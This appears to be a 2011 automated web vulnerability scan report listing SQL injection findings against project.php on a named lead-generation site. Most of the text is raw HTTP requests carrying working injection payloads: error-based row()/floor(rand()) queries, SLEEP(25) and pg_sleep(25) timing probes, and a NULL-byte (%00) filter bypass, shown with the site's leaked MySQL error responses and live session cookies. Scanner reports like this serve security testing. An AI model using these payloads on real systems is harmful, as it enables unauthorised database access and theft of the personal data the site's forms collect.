http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:53 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name%00'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=udli5ng4ft1qutifrim44ub5t1; JSESSIONID=3938ED843130D7AF1696C93CADE0B10E; OAID=029085b33b46dc8b68c77befe6006461 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:55 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8350
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ercard&attributeId_529=3407__ $0 - $5,000&button3=Submit&companyname=Company Name.'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name%00''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=udli5ng4ft1qutifrim44ub5t1; JSESSIONID=3938ED843130D7AF1696C93CADE0B10E; OAID=029085b33b46dc8b68c77befe6006461 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:55 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:56 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:56 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The emailaddress parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emailaddress parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:25:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5
The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:01 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' OR prj.project_pa' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:01 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The firstname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the firstname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:27:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' OR prj.project_pa' at line 5
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc%00'&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:47:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9182
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... R(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc%00''&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code 